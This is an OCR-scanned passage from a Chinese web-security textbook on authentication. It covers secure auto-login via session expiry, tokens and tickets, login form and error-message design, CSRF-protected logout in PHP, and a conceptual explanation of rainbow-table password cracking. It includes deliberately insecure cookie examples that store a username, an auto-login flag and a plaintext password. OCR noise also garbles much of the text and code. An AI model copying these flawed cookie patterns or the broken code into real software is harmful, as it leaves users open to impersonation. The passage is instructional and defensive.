(例子 中 Expires 的 实际 日 期 是 在 30 天 之 后 ) 了 。 


























Set-Cookie: user=yamada; expires=Wed, 27-Oct-2010 06:20:55 GMT 
Set-Cookie: autologin=true; expires=Wed, 27-Oct-2010 06:20:55 GMT 






































在 这 个 例子 中 用 户 名 和 自动 登录 标识 都 用 明文 保存 在 Cookie 中 ,但 是 因为 用 户 本 人 可 以 修 
改 Cookie， 加 入 把 user=yamada 算 改 为 user=tanaka 的 话 ， 就 可 以 冒充 别人 登录 到 系统 里 面 了 。 

虽然 这 个 例子 看 起 来 很 极端 ， 但 是 现实 中 确实 是 存在 着 具有 类 似 安全 隐患 的 Web 网 站 或 者 
软件 的 。 








下 面 的 方法 虽然 针对 上 面 的 问题 作 了 改良 , 但 是 仍然 算 不 上 一 个 好 的 方案 





Set-Cookie: user=yamada; expires=Wed, 27-Oct-2010 06:20:55 GMT 





Set-Cookie: passwd=5x23AwpL; expires=Wed, 27-Oct-2010 06:20:55 GMT 
Set-Cookie: autologin=true; expires=Wed, 27-Oct-2010 06:20:55 GMT 











这 里 虽然 增加 了 对 密码 的 验证 ， 使 得 攻击 者 不 能 很 轻易 地 通过 上 面 的 方法 来 冒充 别人 。 但 是 
如 果 攻 击 者 知道 了 被 攻击 用 户 的 密码 的 话 ， 完 全 可 以 得 堂 正 正 地 从 登录 页 面 登录 系统 了 ， 就 没有 

















而 且 一 旦 在 Cookie 里 存放 了 敏感 信息 的 话 ， 那 么 一 旦 网 站 出 现 XSS 漏洞 的 时 候 ， 就 存在 密 
码 被 瓷 取 的 可 能 性 ， 从 而 可 能 带 来 更 大 的 损失 。 因 此 这 种 方法 仍然 算 不 上 是 形 








E 想 的 实现 方式 。 
下 面 开 始 我 们 介绍 如 何 来 实现 一 个 安全 的 自动 登录 功能 。 
安全 的 自动 登录 实现 方式 
要 实现 保持 用 户 登录 状态 的 功能 ， 可 以 采用 下 面 的 三 种 方式 之 一 。 
延长 会 话 有 效 期 
使 用 令 牌 (Token ) 
使 用 认证 票 (Ticket ) 


下 面 按 顺 序 介 绍 一 下 这 三 种 方法 。 
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令 延长 会 话 有 效 期 

如 果 所 用 的 编程 语言 或 者 框架 支持 设置 Cookie 的 Expires (过 期 时 间 ) 属性 的 话 ， 这 种 方法 
则 最 简单 。 

如 果 使 用 的 是 PHP 的 话 ， 可 以 使 用 以 下 方法 实现 延长 会 话 有 效 期 。 


通过 使 用 session set cookie params 方法 设置 Cookie 的 Expires 属性 值 
在 文件 php.ini 中 将 session.gc_maxlifetime 设置 为 一 周 左右 (默认 为 24 分钟 ) 


但 是 这 样 做 的 话 不 想 保 持 登 录 状 态 的 用 户 的 会 话 过 期 时 间 也 会 被 延长 到 一 周 ， 会 增加 这 些 不 
想 使 用 自动 登录 功能 的 用 户 受到 XSS 等 被 动 攻击 的 概率 。 

解决 这 个 问题 ， 可 以 在 应 用 程序 里 限制 会 话 过 期 时 间 。 如 以 下 的 脚本 解说 。 

首先 是 php ini 文件 中 进 和 了 一 些 设置 的 例子 ， 下 面 这 个 设置 是 保持 会 话 的 有 效 期 至 少 为 一 
星期 。” 


















































session.gc probability = 1 
session.gc divisor = 1000 604800 = 7*24*60*60 


session.gc maxlifetime = 604800 

















之 后 ， 是 在 验证 用 户 密 码 成 功 后 设置 登录 信息 的 地 方 ， 加 入 如 下 逻辑 。 这 里 假设 用 户 选 择 了 
自动 登录 的 话 ， 浏 览 器 会 将 参数 autologin 赋值 为 on 后 传 给 服务 端 。 


代码 清单 ”/51/51-002.php 





















































<?php 
// 假设 在 此 之 前 用 户 密码 验证 已 经 通过 且 成 功 登录 
$autologin = @$ GET['autologin'] == 'on'; 


Stimeout = 30 * 60; 
if ($autologin) { // 自动 登录 的 场景 

Stimeout = 7* 24* 60 * 60; // 会 话 有 效 期 设 为 一 星期 

session set cookie params ($timeout); // Cookie 的 Expires 属 | 


} 


session start(); 



































八 















































session regenerate id(true); // 固定 会 话 ID 对 策 
$_SESSION['id'] = $id; // 登录 中 的 用 户 ID 
$_SESSION['timeout'] = $timeout; // 超时 时 间 (时 长 ) 
$_SESSION['expires'] = time() + $timeout; // 超时 时 间 ( 时刻) 
2 
<body> 


login successful<a href="51-003.php">next</a> 
</body> 














在 这 个 例子 里 自动 登录 后 会 依次 进行 下 面 的 处 理 。 


中 Cos 客户 端 请 求 时 ， 会 以 session.gc_probability / session.gc_divisor 的 概率 进行 会 话 回收 工作 ， 清 理 存 活 时 间 
经 超过 session.gc_maxlifetime 的 会 话 ， 所 以 会 话 被 清理 的 时 机 不 是 实时 的 ， 会 有 一 定 的 延迟 。 
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会 话 超时 时 间 设 为 1 星期 (默认 为 30 分 钟 ) 
将 含有 会 话 了 D 的 Cookie 的 Expires 属性 设置 为 1 星期 后 


否 是 自动 登录 ， 都 会 执行 下 面 这 两 步 


是 
会 话 超 时 时 长 保存 到 $_sEssION['timeout'] 中 
会 话 超时 时 刻 保存 到 $_sESSION['expires'] 中 


下 面 是 判断 用 户 是 和 否 处 于 登录 状态 的 代码 。 下 面 这 部 也 会 确认 之 前 设置 的 会 话 超时 相关 的 属 
性 值 。 


代码 清单 ”/51/51-003.php 























不 


芭 





和 
将 














<?php 
session start(); 
function islogin() { 
if (! isset($ SESSION['id'])) { // 还 没 设置 id 时 


return false; // 没有 登录 


} 





if ($ SESSION['expires'] < time()) { // 该 会 话 已 经 超时 
$_SESSION = array(); // ee 0 变量 
session destroy(); // 放弃 ( 退出 登录 ) 


return false; 


} 
// 更 新 超时 时 刻 


$_SESSION['expires'] = time() + $_ SESSION['timeout']; 












































return true; // 处 于 登录 状态 ， 即 返回 true 
} 
if (islogin()) { 

VB 登录 中 的 处 理 内 容 ( 省 略 了 后 面 的 内 容 




































































islogin 方 法 用 来 判断 用 户 是 否 处 于 登录 状态 。 该 处 理 中 通过 判断 保存 在 会 话 里 的 超时 时 
刻 和 现在 时 刻 来 判断 用 户 会 话 是 否 已 经 超时 了 。 


人 使 用 令 牌 实现 自动 登录 
恨 据 所 使 用 的 编程 语言 不 同 ， 有 时 候 不 能 对 保存 着 会 话 ID 的 Cookie 的 Expires 属性 进行 设 
置 ， 这 时 候 如 果 浏 览 需 一 关 掉 的 话 对 应 的 会 话 也 自动 被 销毁 了 ， 也 就 不 能 通过 编程 语言 在 会 话 的 
管理 机 制 上 实现 保持 用 户 登 录 状 态 的 功能 了 。 

在 这 种 情况 下 要 实现 同样 的 功能 的 话 ， 则 可 以 考虑 使 用 4.6.4 节 里 介绍 过 的 令 牌 来 实现 保持 
用 户 的 登录 状态 。 

















Sr 



































OO 用 户 登 录 时 创建 令 牌 
在 用 户 登 录 成 功 的 时 候 ， 创建 令 牌 并 保存 到 Cookie 中 。Cookie 的 Expires 属性 可 以 设置 为 1 
周 左右 ， 令 牌 的 值 使 用 伪 随 机 数 。 最 好 同时 设置 HttpOnly 属性 ， 另 外 如 果 是 HTTPS 连接 的 话 ， 
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需要 同时 设置 secure 属性 。 
令 牌 的 值 只 是 个 随机 数 ， 每 个 登录 用 户 的 信息 ， 可 以 用 下 图 那样 的 结构 保存 到 数据 库 中 进行 
管理 。 











图 5-10 下 
令 牌 ( 唯一 BD 有 效 期 
如 上 图 所 示 ， 通 过 令 牌 的 值 可 以 知道 哪个 用 户 在 什么 时 间 之 内 能 进行 自动 登录 。 

令 牌 是 在 用 户 登 录 时 候 创 建 的 ( 只 有 在 用 户 选 择 了 自动 登录 的 时 候 才 会 创建 )， 下 面 的 伪 代 
码 展 示 了 该 方法 的 大 致 思路 。 


代码 清单 ”自动 登录 令 牌 创建 过 程 ( 伪 代 码 ) 
























































| 





function set auth token($id, Sexpires) { 
do { 
$token = 随机 数 ， 
准备 查询 ('insert into autologin values(?, ?,，?)'); 
执行 查询 ($token,， S$id, Sexpires); 
if ( 查询 成 功 ) 
return Stoken 
} while ( 数据 重复 错误 ) 
die (' 访问 数据 库 错 误 ' es 
} 


Stimeout = 7* 24* 60 * 60; // 认证 的 有 效 期 (1 周 ) 

$expires = time() + $timeout; // 认证 的 有 效 期 

$token = set auth token($id，S$expires); // 设置 令 牌 
setcookie('token'，S$token，S$expires); // 将 令 牌 的 值 保存 到 Cookie 


















































set_auth_token 方 法 用 来 生成 令 牌 , 输入 参数 为 用 户 ID 和 令 牌 的 有 效 期 间 ， 生 成 令 牌 
的 值 后 将 这 些 信息 保存 到 数据 库 中 ， 并 返回 生成 的 令 牌 值 给 调用 函数 。 如 果 生 成 令 牌 值 的 过 程 中 
发 生 了 值 重复 问题 ， 则 需要 继续 尝试 直到 生成 不 重复 的 令 牌 值 为 止 。 

在 上 面 的 示例 代码 里 最 后 ， 也 展示 了 如 何 调 用 生成 令 牌 函数 。 这 里 将 表示 自动 登录 的 有 效 期 
参数 设 为 一 周 后 调用 set_auth token， 并 将 返回 的 令 牌 保存 到 了 Cookie。 








人 判断 用 户 的 登录 状态 和 执行 自动 登录 
接着 我 们 再 看 看 如 何 实 现 判 断 用 户 是 否 处 在 登录 中 状态 ， 以 及 如 何 实现 自动 登录 。 人 处 理 逻 辑 
见 下 面 的 伪 代 码 。 


代码 清单 ”判断 用 户 是 否 已 登录 以 及 如 何 实现 自动 登录 ( 伪 代 码 ) 











function check auth token($token) { 





准备 查询 ('select * from autologin where token = ?3'); 
执行 查询 ($token); 

取得 $iqd 和 有 效 期 ; 

if (不 存在 相应 记录 ) 
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return false; 

if ( 有 效 期 < 现在 时 刻 ) { 
放弃 旧 认 证 令 牌 ; 
return false; 

} 

return S$id; 


} 


function islogin(s$token) 

if ( 会 话 中 是 否 有 认证 信息 ) 

return 认证 成 功 ; XI 已 经 是 登录 中 状态 了 
// 从 下 始 是 会 话 已 经 超时 ， 开 始 自动 登录 处 理 
$id = check auth token ($token); 
if ($id !== false) { 

将 认证 信息 放 到 会 话 ; 

放弃 上 昌 认 证 令 牌 ; 

设置 新 的 认证 令 牌 ( 及 新 的 有 效 期 间 ) ; 

return 认证 成 功 ; 
} 
return 认证 失败 ; // 自动 登录 失败 的 时 候 

















































































































































































































} 
// 需要 编写 批 处 理 程序 来 定期 从 数据 库 删 除 已 经 过 期 的 认证 令 牌 记录 























islogin 子 数 先 判 断 现 在 会 话 里 是 否 有 用 户 的 登录 信息 ， 如 果 有 的 话 就 认为 用 户 已 经 登 
录 了 ,将 直接 返回 成 功 。 如 果 会 话 里 不 存在 用 户 的 登录 信息 的 话 ， 则 继续 调用 check_auth_ 
token 函数 ， 尝 试 进行 自动 登录 。 在 check_auth token 方法 里 根据 传 过 来 的 令 牌 信息 来 查 
找 用 户 的 自动 登录 数据 ， 如 果 数 据 库 中 存在 此 令 牌 数据 ， 且 有 效 期 间 没 有 过 期 的 话 ， 则 返回 登录 
中 的 用 户 ID。 

如 果 执 行 自动 登录 成 功 的 话 ， 需 要 先 删 掉 旧 的 令 牌 信息 ， 然 后 再 生成 新 的 令 牌 并 保存 到 数据 
库 中 。 之 所 以 选择 删除 原来 的 令 牌 再 创建 新 的 ， 而 不 是 简单 地 更 新 原 令 牌 的 有 效 期 间 ， 是 因为 如 
果 原 令 牌 如 果 由 于 某 些 原因 被 泄露 的 话 ， 有 可 能 被 别人 拿 来 进行 恶意 攻击 ， 所 以 最 好 采取 删除 原 
令 牌 的 方法 。 同 样 的 原因 ， 在 用 户 修改 密码 后 ， 也 应 该 对 令 牌 信息 做 类 似 的 处 理 。 




























































































O 退出 登录 

在 进行 退出 登录 处 理 的 时 候 ， 需 要 以 用 户 ID 为 查询 条 件 ， 在 用 户 自动 登录 数据 表 里 把 这 
用 户 对 应 的 令 牌 信息 删除 。 考 虑 到 用 户 可 能 在 不 同 的 终端 上 登录 并 且 启用 了 自动 登录 ， 所 以 这 里 
删除 用 户 的 自动 登录 数据 的 时 候 ， 需 要 以 用 户 ID 为 条 件 而 不 能 用 令 牌 。 


人 

















代码 清单 ”退出 登录 处 理 ( 伪 代 码 ) 





$_SESSION = array(); // 销毁 $_ SESSION 变量 
session destroy(); // 销毁 会 话 ( 退出 登录 ) 



























































// 根据 用 户 ID 删除 该 用 户 所 有 自动 登录 数据 
准备 删除 语句 ('delete from autologin where id=?'); 


执行 删除 语句 ($id); 
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令 基于 认证 票 的 自动 登录 方式 

认证 票 是 为 了 在 不 同 的 服务 器 之 间 共 享用 户 的 认证 数据 (用户 名 ， 有 效 期 间 ) 而 设计 的 。 为 
了 防止 伪造 或 者 信息 泄露 ， 认 证 票 可 能 会 需要 电子 署名 或 者 加 密 。Windows 所 采用 的 Kerberos 
认证 ， 以 及 ASPNET 的 表单 认证 ( From 认证 ) 等 都 采用 了 认证 票 的 方法 。 

认证 票 方法 的 优点 是 可 以 跨 服务 器 共享 用 户 的 认证 信息 。 但 是 实现 认证 票 功能 的 话 需要 比较 
专业 的 加 密 或 者 安全 方面 的 知识 ， 尽 量 避 人 免 自己 去 实现 。 

如 果 想 在 在 多 台 服 务 器 之 间 共 享 认证 数据 的 话 ， 推 荐 采用 第 三 方 的 单 点 登录 系统 (SSO )， 
或 者 使 用 OpenID 等 开放 的 认证 平台 产品 。 

















人 三 种 方法 的 比较 
关于 如 何 实现 用 户 自动 登录 功能 ， 上 面 我 们 介绍 了 延长 会 话 超时 时 间 、 令 牌 和 认证 票 等 三 种 
方法 。 这 之 中 ,使 用 令 牌 方式 是 比较 好 的 选择 。 令 牌 方式 的 优点 有 如 下 几 条 。 


对 不 想 使 用 自动 登录 功能 的 用 户 不 构成 任何 影响 

针对 使 用 多 终端 登录 的 用 户 可 以 实现 一 次 全 部 退出 登录 
管理 员 可 以 强制 使 指定 的 用 户 退 出 登录 

在 客户 端 不 额外 保存 敏感 信息 ， 不 存在 被 恶意 利用 的 风险 























如 何 降低 自动 登录 带 来 的 风险 

自动 登录 带 来 的 问题 是 用 户 的 认证 状态 会 持续 很 长 时 间 ， 这 会 增加 用 户 遭 受 XSS 或 CSRF 
等 被 动 攻击 的 风险 。 

针对 此 问题 ， 可 以 在 关键 操作 ， 比 如 查看 重要 信息 (个 人 信息 等 )、 重 要 的 操作 (购物 、 转 
账 、 修 改 密码 ) 之 前 加 入 密码 确认 步 又 。 亚 马 逊 就 是 采用 这 种 方法 的 网 站 之 一 ， 通 常情 况 下 用 户 
访问 亚马逊 是 在 登录 状态 下 进行 的 ， 但 是 用 户 如 果 想 下 单 或 者 查看 历史 订单 等 重要 操作 前 就 会 被 
要 求 再 次 输入 密码 进行 验证 。 






























































5.1.5 登录 表单 
这 一 节 我 们 将 对 登录 表单 (用 户 输入 ID 和 密码 的 页 面 ) 的 安全 性 要 求 做 一 下 说 明 。 实 现 登 
录 表 单 的 时 候 最 基本 的 原则 如 下 。 
密码 输入 框 需 要 掩 码 ( Mask ) 显示 
如 果 应 用 需要 使 用 HTTPS 的 话 ， 从 登录 表单 显示 页 面 开始 就 应 该 使 用 HTTPS 
所 谓 输 入 密码 的 掩 码 显示 ， 是 指使 用 类 型 是 password 的 输入 控件 ， 使 用 这 种 控件 后 ， 输 入 


的 密码 在 页 面 上 显示 时 会 以 “*” 的 符号 显示 出 来 。 这 样 就 能 降低 因 shoulder hack 导致 密码 被 盗 
取 的 风险 。 
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下 面 说 一 下 为 什么 需要 在 登录 表单 显示 页 面 就 要 使 用 HTTPS。 在 输入 密码 的 页 面 和 进行 登 
录 人 处理 的 页 面 中 ， 如 果 把 后 面 的 页 面 放 在 HTTPS 下 的 话 ， 用 户 输 入 的 密码 会 被 加 密 后 传递 给 服 
务 器 ， 这 样 就 能 防止 密码 被 资 取 了 。 但 是 如 果 在 输入 密码 的 页 面 不 使 用 HTTPS 的 话 ， 就 可 能 会 
存在 如 下 风险 。 


登录 表单 被 算 改 ， 跳 转 目 的 地 址 被 设 为 攻击 者 的 地 址 
如 果 遗 受 DNS 欺骗 (DNS cache poisoning 或 DNS spoofing ) 攻击 的 话 ， 用 户 可 能 会 被 转 
到 攻击 者 的 网 站 
如 果 我 们 在 显示 登录 表单 的 页 面 开 始 使 用 HTTPS 的 话 ， 就 能 防止 该 页 面 的 内 容 被 算 改 。 即 使 
用 户 被 诱骗 到 其 他 网 站 ， 浏 览 器 也 会 显示 出 错 信 息 ， 提 醒 用 户 注意 (用户 需要 确认 域名 是 否 正确 )。 
所 以 说 ， 如 果 要 使 用 HTTPS 的 话 ， 请 一 定 在 登录 显示 页 面 开始 就 使 用 HTTPS。 





































































































现在 编写 登录 页 面 时 ， 将 密码 输入 框 做 掩 码 处 理应 该 算是 最 基本 的 常识 了 ， 但 是 笔者 却 对 此 
有 些 疑 问 。 如 果 对 输入 框 进行 了 掩 码 设置 ， 那 么 输入 包含 符号 、 大 小 写字 母 的 密码 会 变 得 稍微 有 
点 麻烦 ， 用 户 可 能 会 有 选择 更 简单 的 密码 ， 这 对 系统 安全 性 来 说 反而 是 一 个 不 利 因素 ， 这 也 是 笔 
者 对 掩 码 处 理 持 有 疑问 的 原因 。 
大国 关于 Web 使 用 方便 性 的 权威 Jakob Nielsen 在 2009 年 6 月 发 表 了 一 篇 “请 停止 隐藏 密码 
显示 ” “的 专栏 文章 , 这 篇 文章 里 列举 了 很 多 隐藏 密码 明文 显示 的 缺点 , 当时 出 现 了 很 多 反对 的 意见 ， 
但 是 SANS 的 博客 里 却 对 此 表示 了 赞同 的 看 法 <2。 这 篇 文章 也 成 了 当时 大 家 关注 的 话题 。 

把 目光 转向 Web 网 站 以 外 ， 可 以 发 现在 桌面 端 应 用 程序 里 面 ， 有 很 多 软件 都 提供 了 在 密码 
的 明文 显示 和 掩 码 显 示 之 间 的 切换 功能 。 比 如 下 面 的 图 显示 的 就 是 Windows Vista 的 VPN 设置 
面 ， 画 面 里 有 一 个 “显示 字符 ”的 复 选 框 。 
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5-11 密码 显示 /不 显示 的 例子 





注册 

Liu Bin 

Yahoo 用 户 名 @yahoo.com 
3Q#$34AVU7al 可 显示 





请 使 用 :8 至 32 个 字符 Y 大 写 和 小 写字 母 Y 号 码 


OD http://www.nngroup.com/articles/stop-password-masking/ 
@ https://blogs.sans.org/appsecstreetfighter/2009/06/28/response-to-nielsens-stop-password-masking/ 
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密码 认证 的 最 大 的 威胁 是 跨越 网 络 的 暴力 破解 ， 而 预防 抗暴 力 破解 的 最 好 的 方法 就 是 选择 安 
全 的 密码 。 以 后 提供 “显示 密码 字符 ” 复 选 框 的 网 站 数量 也 许 会 增加 。 但 是 如 果 使 用 浏览 器 的 密 
码 自动 保存 功能 的 话 ， 有 可 能 画面 一 显示 出 来 就 把 明文 密码 都 暴露 了 ， 会 被 别人 看 见 ， 这 是 个 比 
较 厅 烦 的 问题 ， 所 以 “显示 密码 字符 ”的 复 选 框 需要 默认 为 不 被 选中 。 



















































































5.1.6 ”如 何 显示 错误 消息 


本 节 将 说 明 一 下 如 何在 用 户 登录 界面 正确 的 显示 错误 消息 。 
不 管 什 么 错误 消息 ， 其 原则 都 是 不 能 留 给 攻击 者 任何 提示 。 在 登录 功能 里 像 下 面 的 两 个 错误 
消息 都 是 对 安全 不 利 的 : 


“指定 的 用 户 不 存在 ” 
“密码 不 正确 ” 























为 攻击 者 从 这 些 消息 里 就 可 以 知道 到 底 是 用 户 ID 错 了 还 是 密码 错 了 ， 使 得 暴力 破解 将 会 
更 有 针对 性 。 图 5-12 是 在 知道 用 户 ID/ 密码 哪个 错误 和 不 知道 用 户 ID/ 密码 哪个 错误 这 两 种 情况 
下 ， 攻 击 所 需要 成 本 的 对 比 。 


5-12 ”如 果 知 道 登录 ID 或 者 密码 哪个 错 了 的 话 破解 将 会 变 容易 








































































































登录 ID 和 密码 各 尝试 1 万 次 
登录 ID 登录 ID 
12345… 10000 12345… 10000 
1 1 
2 2 
3 3 
4 4 
5 5 本 
密 : 密 中 
码 码 a 
10000 10000 [| 
知道 登录 ID 或 者 密码 哪个 不 正确 的 时 候 不 知道 登录 ID 或 者 密码 哪个 不 正确 的 时 候 











如 果 是 用 户 ID 不 正确 (不 存在 ) 的 话 ， 如 左 图 ， 首 先 攻 击 者 会 一 直 尝 试 使 用 不 同 的 用 户 ID， 
直到 找到 了 系统 里 存在 的 用 户 ID， 然 后 再 开始 进行 猜测 密码 ， 这 样 的 话 最 多 需要 尝试 2 万 次 
就 够 了 。 如 果 攻 击 者 不 知道 登录 ID 或 者 密码 哪个 不 正确 的 话 ， 就 需要 尝试 所 有 的 用 户 ID 和 密 
码 的 组 合 ， 也 就 是 至 少 需 要 尝试 1 万 x 1 万 ， 即 1 亿 次 才 行 。 可 以 看 出 ,错误 消息 可 以 在 很 大 程 
度 上 对 攻击 者 的 攻击 效率 产生 影响 。 

同样 ， 有 时 候 攻 击 者 也 可 以 通过 用 户 账号 被 锁定 时 显示 的 错误 信息 来 推测 用 户 ID 是 否 存在 ， 
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所 以 推荐 在 发 生 账号 被 锁定 的 时 候 使 用 类 似 下 面 那 样 的 消息 ( 如果 系 统 支 持 账 号 锁定 功能 的 话 ) : 


“ID 或 者 密码 错误 ， 账 号 已 被 锁定 ” 
尽管 这 样 会 让 真正 的 用 户 不 知道 到 底 是 自己 的 用 户 ID 错 了 还 是 密码 错 了 ， 























但 我 们 在 5.1.2 市 


提 到 了 ， 用 户 账号 被 锁定 的 时 候 ， 最 好 同时 给 用 户 发 送 邮 件 通 知 。 所 以 如 果 在 上 面 弹出 的 错误 消 





息 后 面 加 上 类 似 下 面 这 段 文字 的 话 ， 用 户 体验 会 更 好 一 些 。 








※ 账号 锁定 时 将 发 送 邮件 通知 账号 所 有 者 ,如 果 有 什么 疑问 ,请 查看 邮件 内 容 进 行 确认 。 





























5.1.7 退出 登录 功能 
比较 安全 的 退出 登录 处 理 的 做 法 是 销毁 会 话 对 象 。 另 外 ， 有 时 候 需 要 在 退 ! 
防止 CSRF 漏洞 的 逻辑 ， 但 是 如 果 由 第 三 方 强制 退出 登录 没有 什么 大 的 不 利 景 
虑 省 略 预防 CSRF 的 处 理 。 
下 面 是 在 退出 登录 需要 做 的 事 。 
退出 登录 处 理 有 副作用 所 以 用 POST 提交 退出 登录 请 求 
在 退出 登录 处 理 中 销毁 会 话 对 象 
根据 需要 选择 是 否 加 入 CSRF 处 理 
发 起 退出 登录 请 求 的 页 面 实现 示例 请 参考 下 面 的 代码 。 


代码 清单 ”/51/51-011.php 






































民 出 登录 的 时 候 加 入 
区 响 的 话 ， 也 可 以 考 








Re 
ly 





【 前面 省 略 】// 这 里 假设 已 经 执行 了 session start (); 

<form action="51-012.php" method="POST"> 

<-- 下 面 是 防止 CSRF 的 令 牌 --> 

<input type="hidden" name="token" value="<?php echo 












































htmlspecialchars (session id()); ?>"> 





<input type="submit" value=" 退出 登录 "> 
</form> 























这 段 代码 通过 POST 方式 向 执行 退出 操作 的 脚本 (51-012.php ) 发 起 请 求 ， 








的 措施 ， 同 时 传 一 个 hidden 的 参数 token，token 直接 使 用 了 会 话 ID 的 值 。 
执行 退出 登录 的 处 理 如 下 所 示 。 


代码 清单 ”/51/51-012.php 





作为 预防 CSRF 





<?php 
$token = $ POST['token']; 
session start(); 


// 进行 令 牌 验证 
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if ($token != session id()) { 
die(' 点 击 退 出 登录 按钮 退出 ') ; 








} 
// 清空 $_SESSION 变量 
$_SESSION = array(); 
// 销毁 session 
session destroy(); 














在 这 段 代 码 的 前 半 部 分 是 进 性 预防 CSRF 的 令 牌 检查 ， 关 于 CSRF 对 策 的 详细 内 容 可 以 参考 
4.5.1 节 。 

上 面 脚本 的 后 半 部 分 是 执行 退出 登录 处 理 的 中 心 内容 ， 先 对 $_SESSION 变量 进行 了 清空 操 
作 ， 然 后 又 销毁 了 会 话 。 如 果 只 是 退出 登录 的 话 ， 不 必 对 $_SESSION 进行 清空 操作 ， 但 是 为 了 
防止 以 后 在 退出 登录 后 增加 逻辑 时 不 小 心 发 生 其 他 问题 ， 安 全 起 见 对 这 个 变量 进行 了 清空 处 理 。 














5.1.8 ”认证 功能 总 结 


这 一 节 我 们 介绍 了 几 种 能 增强 系统 认证 功能 安全 性 的 一 些 方法 。 用 户 / 密码 认证 作为 现在 主 
流 的 认证 方式 ， 可 以 采用 下 面 的 方法 来 提高 其 安全 性 。 
密码 可 用 字符 种 类 和 长 度 的 要 求 
请 参考 5.1.1 节 
请 参考 5.1.1 节 
针对 暴力 破解 的 对 策 
请 参考 5.1.2 节 
密码 保存 方法 
请 参考 5.1.3 节 
输入 页 面 和 错误 信息 的 需求 
请 参考 5.1.5 节 
请 参考 5.1.6 节 


此 外 ， 本 市 还 介绍 了 如 何 安 全 的 实现 自动 登录 和 退出 登录 功能 。 








参考 : 彩虹 表 原 理 

即使 攻击 者 得 到 了 密码 的 散 列 值 去 暴力 破解 ,时间 成 本 还 是 非常 高 的 ， 于 是 有 人 提出 了 用 反 
向 查找 表 来 提高 查询 速度 的 方法 。 这 里 所 说 的 反 向 查找 表 是 指 把 密码 的 散 列 值 作为 查找 表 的 键 
( Key )， 而 把 密码 原文 作为 查找 表 的 值 ( Value ) 存储 。 表 5-3 是 一 个 的 反 向 查找 表 例 子 。 
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表 5-3 ” 散 列 值 反 向 查找 表示 例 

















散 列 值 密码 
098f6bcd46 test 
5f4dcc3b5a password 
900150983c abc 
d16fb36f09 XxXyz 




















但 是 如 果 直 接 去 生成 这 样 一 个 查找 表 的 话 ， 其 大 小 将 会 过 于 庞大 。 所 以 有 人 又 设想 如 果 能 按 
照 蘑 些 规则 ， 做 出 一 个 密码 1 一 散 列 值 1 一 密码 2 一 散 列 值 2 一 密码 3 一 散 列 值 3 一 … 这 样 的 链 
表 的 话 ， 那 么 我 们 只 需要 记 住 链表 的 表 头 和 表 尾 就 可 以 了 。 这 就 是 彩虹 表 的 最 显著 特征 。 

为 了 建立 这 样 一 个 链表 ， 就 需要 知道 如 何 从 一 个 密码 的 散 列 值得 到 其 后 面 的 密码 ， 实 现 这 个 
功能 的 函数 被 称 为 还 原 函 数 (Reduction Function )。 还 原 函 数 的 功能 就 是 从 给 定 的 散 列 值 ， 生 成 
一 个 符合 密码 规范 ( 可 使 用 字符 种 类 及 密码 长 度 ) 的 新 密码 字符 串 。 在 链表 里 的 不 同位 置 需要 使 
用 不 同 的 还 原 函 数 ， 而 不 能 全 部 使 用 同一 个 还 原 函数 。 在 图 5-13 的 例子 里 ， 由 于 一 共 进 行 了 
3 次 散 列 值 还 原 操作 ， 所 以 相应 地 也 就 需要 3 个 还 原 函数 。 


图 5-13 彩虹 表 的 链表 结构 

散 列 函 数 还 原 1 散 列 函数 还 原 2 散 列 函数 还 原 3 
system a48927 | qwerty 52Ee2 aqmin1l ed07a6 root00 
密码 1 散 列 值 1 密码 2 散 列 值 2 密码 3 散 列 值 3 密码 4 


为 了 能 多 保存 一 些 密码 组 合 ， 首 先 需 要 选择 链表 的 第 一 个 元 素 ， 然 后 通过 计算 得 到 整个 链 
表 。 在 把 彩虹 表 数 据 保 存 到 文件 的 时 候 ， 只 需要 记录 这 个 链表 的 头 和 尾 的 元 素 即 可 。 图 5-14 是 
彩虹 表 在 文件 中 保存 的 大 概 样子 。 


图 5-14 彩虹 表 的 保存 方法 示例 

























































































链表 头 元 素 。” 链表 末尾 元 素 























system root00 
pass0l1 abcdef 
123456 dazwsx 
aqmini 987654 

















下 面 我 们 以 散 列 值 a48927 为 例 来 看 看 如 何 利 用 彩虹 表 来 计算 出 该 散 列 值 对 应 的 原 密码 。 最 
开始 检索 的 时 候 由 于 不 知道 这 个 散 列 值 在 链表 的 哪个 位 置 上 ， 所 以 需要 对 每 个 位 置 进 行 验 证 。 首 
先 ， 使 用 还 原 函 数 和 散 列 函数 分 别 计算 出 其 在 链表 各 个 位 置 时 的 链表 末尾 元 素 的 值 ， 得 到 的 结 
是 lookie、abcxyz、root00 这 三 个 值 ， 如 图 5-15 所 示 。 

















典型 安全 功能 





5-15 ”使 用 彩虹 表 进 行 检索 的 过 程 























































































































还 原 3 
a48927 lookie | 不 匹配 
散 列 值 3 密码 4 
还 原 2 散 列 函数 还 原 3 
| a48927 | user01 0ab38c abcxyz | 不 匹配 
散 列 值 2 密码 3 散 列 值 3 密码 4 
还 原 1 散 列 函数 还 原 2 散 列 函数 还 原 3 
| a48927 qwerty B62fe2 | adqmin1l ed07a6 root00 
散 列 值 1 密码 2 散 列 值 2 密码 3 散 列 值 3 密码 4 
和 root00 匹配 
从 链表 头 元 素 system 开始 检索 
= = 链表 头 元 素 ” 链表 末尾 元 素 
system root00 
散 列 函 数 a 
找到 a48927 pass01 abcdef 
system | es | 的 原文 system 
密码 1 散 列 值 1 ”AN 
彩虹 表 


接着 ,依次 查找 这 些 产 生 的 密码 是 否 在 彩虹 表 链 表 的 最 尾部 ， 就 找到 了 以 root00 为 最 末 元 








素 的 链表 。 然 后 ， 在 彩虹 表 里 找到 相应 的 链表 的 头 元 素 ， 即 system。 


以 system 开始 ， 依 次 使 用 散 列 函数 和 还 原 函 数 进 行 链表 计算 ， 就 能 发 现 system 的 散 列 值 就 


是 a48927， 即 需要 检索 的 密码 原文 就 是 system。 


彩虹 表 的 数据 文件 里 只 保存 了 每 个 链表 的 开头 和 结尾 的 元 素 ， 其 大 小 只 由 组 成 密码 的 字符 种 
旦 彩虹 表 的 算法 和 具体 的 散 列 函 数 ( 比如 MD5 ) 
[ 表 ， 比 如 已 经 有 公开 的 适用 于 SHA-1 的 彩虹 表 了 。 


类 和 密码 长 度 决定 ， 跟 具体 的 散 列 算法 无 关 。 而 ] 
本 身 无 关 ， 可 以 针对 任何 散 列 函数 创建 彩 如 








预计 今后 也 会 创建 针对 SHA-256 的 彩虹 表 。 


参考 文献 


[ 1 ] Niels Ferguson, Bruce Schneier, Tadayoshi Kohno. (2010). Cryptography Engineering. Wiley Publishing, Inc. 
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5.2 ”账号 管理 





